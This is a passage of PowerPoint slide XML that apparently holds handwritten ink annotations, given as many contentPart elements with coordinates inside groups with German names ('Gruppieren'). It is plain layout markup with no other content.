                <a:ext cx="136080" cy="11880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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59806" y="2646674"/>
                  <a:ext cx="153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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8125126" y="2661074"/>
                <a:ext cx="121680" cy="169920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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16126" y="2652434"/>
                  <a:ext cx="139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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8295046" y="2679434"/>
                <a:ext cx="73800" cy="5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86406" y="2670434"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8361286" y="2671874"/>
                <a:ext cx="23760" cy="727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52646" y="2663234"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8435086" y="2669354"/>
                <a:ext cx="78120" cy="493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26086" y="2660714"/>
                  <a:ext cx="95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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8431126" y="2652074"/>
                <a:ext cx="128520" cy="1551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22486" y="2643434"/>
                  <a:ext cx="146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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8609686" y="2580074"/>
                <a:ext cx="70200" cy="1569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00686" y="2571074"/>
                  <a:ext cx="87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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8667646" y="2678354"/>
                <a:ext cx="101160" cy="6048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59006" y="2669714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8803366" y="2672954"/>
                <a:ext cx="97920" cy="8028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94726" y="2664314"/>
                  <a:ext cx="115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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8927566" y="2686634"/>
                <a:ext cx="11520" cy="7488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918926" y="2677634"/>
                  <a:ext cx="29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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8953846" y="2673674"/>
                <a:ext cx="127080" cy="7704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45206" y="2665034"/>
                  <a:ext cx="144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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9109726" y="2557754"/>
                <a:ext cx="43200" cy="17820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101086" y="2548754"/>
                  <a:ext cx="608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BA5B70B-C698-45F4-9C76-AB4D89C347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7081126" y="2684834"/>
            <a:ext cx="171000" cy="128880"/>
            <a:chOff x="7081126" y="2684834"/>
            <a:chExt cx="17100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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7081126" y="2684834"/>
                <a:ext cx="105120" cy="1267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72486" y="2675834"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7245286" y="2800754"/>
                <a:ext cx="6840" cy="1296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236286" y="2792114"/>
                  <a:ext cx="244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4" name="Gruppieren 1073">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C573F4E-EF79-4D61-8FC6-13F9F5B4B4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3163570" y="2451194"/>
            <a:ext cx="1951560" cy="692280"/>
            <a:chOff x="3384286" y="2451194"/>
            <a:chExt cx="195156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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3485086" y="2800394"/>
                <a:ext cx="1767600" cy="28368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76446" y="2791754"/>
                  <a:ext cx="1785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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5098966" y="2873474"/>
                <a:ext cx="236880" cy="270000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89966" y="2864834"/>
                  <a:ext cx="254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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3384286" y="2604194"/>
                <a:ext cx="132120" cy="199800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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75286" y="2595194"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3613246" y="2743514"/>
                <a:ext cx="4320" cy="6840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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604246" y="2734874"/>
                  <a:ext cx="2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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3690646" y="2577914"/>
                <a:ext cx="43200" cy="129240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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82006" y="2568914"/>
                  <a:ext cx="60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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3656446" y="2530754"/>
                <a:ext cx="176040" cy="191520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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47806" y="2521754"/>
                  <a:ext cx="193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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3884686" y="2580074"/>
                <a:ext cx="74160" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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876046" y="2571074"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3981526" y="2581514"/>
                <a:ext cx="123480" cy="70920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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72886" y="2572874"/>
                  <a:ext cx="141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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4137406" y="2528234"/>
                <a:ext cx="112680" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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28406" y="2519594"/>
                  <a:ext cx="130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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4290406" y="2521034"/>
                <a:ext cx="79560" cy="84960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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281406" y="2512394"/>
                  <a:ext cx="97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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377166" y="2539034"/>
                <a:ext cx="113040" cy="80640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68166" y="2530394"/>
                  <a:ext cx="130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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4551766" y="2451194"/>
                <a:ext cx="225360" cy="194400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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43126" y="2442554"/>
                  <a:ext cx="243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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4598566" y="2558474"/>
                <a:ext cx="109080" cy="19800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89566" y="2549834"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4809166" y="2547314"/>
                <a:ext cx="109800" cy="169200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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00166" y="2538314"/>
                  <a:ext cx="127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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4931926" y="2571794"/>
                <a:ext cx="132120" cy="151560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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923286" y="2562794"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5017246" y="2702474"/>
                <a:ext cx="11520" cy="6480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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08246" y="2693834"/>
                  <a:ext cx="291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4" name="Gruppieren 1153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC7B641-B3E1-4C34-9BE8-1B6E5DED0EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3232690" y="3382874"/>
            <a:ext cx="1801080" cy="264240"/>
            <a:chOff x="3453406" y="3382874"/>
            <a:chExt cx="18010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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3508486" y="3419594"/>
                <a:ext cx="1746000" cy="227520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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499486" y="3410954"/>
                  <a:ext cx="1763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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3453406" y="3382874"/>
                <a:ext cx="264240" cy="157320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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444406" y="3374234"/>
                  <a:ext cx="2818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3" name="Gruppieren 1152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71BDADD-765D-4DED-B435-D99857DE7324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3234130" y="3624434"/>
            <a:ext cx="2040120" cy="342000"/>
            <a:chOff x="3454846" y="3624434"/>
            <a:chExt cx="20401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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3454846" y="3668354"/>
                <a:ext cx="131400" cy="247320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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445846" y="3659714"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3640246" y="3900194"/>
                <a:ext cx="360" cy="2520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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631606" y="3891194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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3706126" y="3784634"/>
                <a:ext cx="28440" cy="150840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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97486" y="3775634"/>
                  <a:ext cx="46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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3683086" y="3714794"/>
                <a:ext cx="210960" cy="165600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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674086" y="3705794"/>
                  <a:ext cx="228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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3912046" y="3813074"/>
                <a:ext cx="128160" cy="107280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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903406" y="3804074"/>
                  <a:ext cx="145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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4015366" y="3754034"/>
                <a:ext cx="83160" cy="177120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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06366" y="3745034"/>
                  <a:ext cx="100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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4139926" y="3851954"/>
                <a:ext cx="59400" cy="81360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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31286" y="3842954"/>
                  <a:ext cx="77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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4241446" y="3873914"/>
                <a:ext cx="27360" cy="64800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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32806" y="3865274"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4226326" y="3779594"/>
                <a:ext cx="19440" cy="31680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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17686" y="3770594"/>
                  <a:ext cx="37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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4282126" y="3865994"/>
                <a:ext cx="83880" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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73126" y="3856994"/>
                  <a:ext cx="101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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377526" y="3852314"/>
                <a:ext cx="85680" cy="96480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68526" y="3843314"/>
                  <a:ext cx="103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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4487326" y="3826034"/>
                <a:ext cx="111600" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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78326" y="3817034"/>
                  <a:ext cx="129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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4714846" y="3786794"/>
                <a:ext cx="27720" cy="164160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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706206" y="3777794"/>
                  <a:ext cx="45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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4695406" y="3724154"/>
                <a:ext cx="125640" cy="113040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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686766" y="3715154"/>
                  <a:ext cx="143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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4803766" y="3836834"/>
                <a:ext cx="132120" cy="70560"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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794766" y="3828194"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4955326" y="3810554"/>
                <a:ext cx="89280" cy="155880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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46686" y="3801914"/>
                  <a:ext cx="106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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5044606" y="3714434"/>
                <a:ext cx="54720" cy="159840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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035606" y="3705434"/>
                  <a:ext cx="72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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5102926" y="3786794"/>
                <a:ext cx="70560" cy="53280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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093926" y="3778154"/>
                  <a:ext cx="88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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5211286" y="3749354"/>
                <a:ext cx="101160" cy="76320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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202646" y="3740714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5316046" y="3706514"/>
                <a:ext cx="109080" cy="93600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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07406" y="3697874"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5339446" y="3624434"/>
                <a:ext cx="155520" cy="153000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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330446" y="3615434"/>
                  <a:ext cx="1731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2" name="Gruppieren 1151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA7DEBB-69B3-4AEF-8FA2-4E1D5B9AF097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1516886" y="3893714"/>
            <a:ext cx="796320" cy="438840"/>
            <a:chOff x="1905766" y="3893714"/>
            <a:chExt cx="79632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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1927366" y="3893714"/>
                <a:ext cx="662040" cy="188640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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918726" y="3884714"/>
                  <a:ext cx="679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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2445406" y="3951314"/>
                <a:ext cx="256680" cy="109800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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36766" y="3942314"/>
                  <a:ext cx="274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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1933486" y="4111874"/>
                <a:ext cx="678600" cy="220680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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924486" y="4102874"/>
                  <a:ext cx="696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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1905766" y="4185314"/>
                <a:ext cx="183240" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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96766" y="4176674"/>
                  <a:ext cx="2008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1" name="Gruppieren 1150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D186CA7A-2A92-46D2-BA6B-7E5E81E18832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1221354" y="4417945"/>
            <a:ext cx="1976040" cy="338400"/>
            <a:chOff x="1707406" y="4351994"/>
            <a:chExt cx="19760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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1707406" y="4406354"/>
                <a:ext cx="102240" cy="148680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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698406" y="4397714"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1828726" y="4491314"/>
                <a:ext cx="20880" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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819726" y="4482314"/>
                  <a:ext cx="3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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1914046" y="4588514"/>
                <a:ext cx="11880" cy="14040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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905046" y="4579874"/>
                  <a:ext cx="29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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2032126" y="4462514"/>
                <a:ext cx="21960" cy="120960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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023126" y="4453874"/>
                  <a:ext cx="39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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2010886" y="4417154"/>
                <a:ext cx="89640" cy="26640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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002246" y="4408514"/>
                  <a:ext cx="107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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2034286" y="4534874"/>
                <a:ext cx="92880" cy="9360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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25646" y="4526234"/>
                  <a:ext cx="110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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2067046" y="4585634"/>
                <a:ext cx="102600" cy="26280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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58046" y="4576994"/>
                  <a:ext cx="120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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2166046" y="4536674"/>
                <a:ext cx="105120" cy="73080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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57406" y="4528034"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2169646" y="4503914"/>
                <a:ext cx="101520" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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61006" y="4495274"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2298166" y="4492754"/>
                <a:ext cx="105120" cy="96120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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89166" y="4484114"/>
                  <a:ext cx="122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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2406526" y="4483394"/>
                <a:ext cx="101520" cy="101520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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97886" y="4474754"/>
                  <a:ext cx="119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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2604526" y="4576274"/>
                <a:ext cx="3960" cy="2880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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95526" y="4567274"/>
                  <a:ext cx="21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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2650966" y="4399154"/>
                <a:ext cx="23760" cy="162720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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42326" y="4390514"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2608486" y="4353074"/>
                <a:ext cx="157680" cy="121320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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99486" y="4344074"/>
                  <a:ext cx="175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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2763646" y="4449554"/>
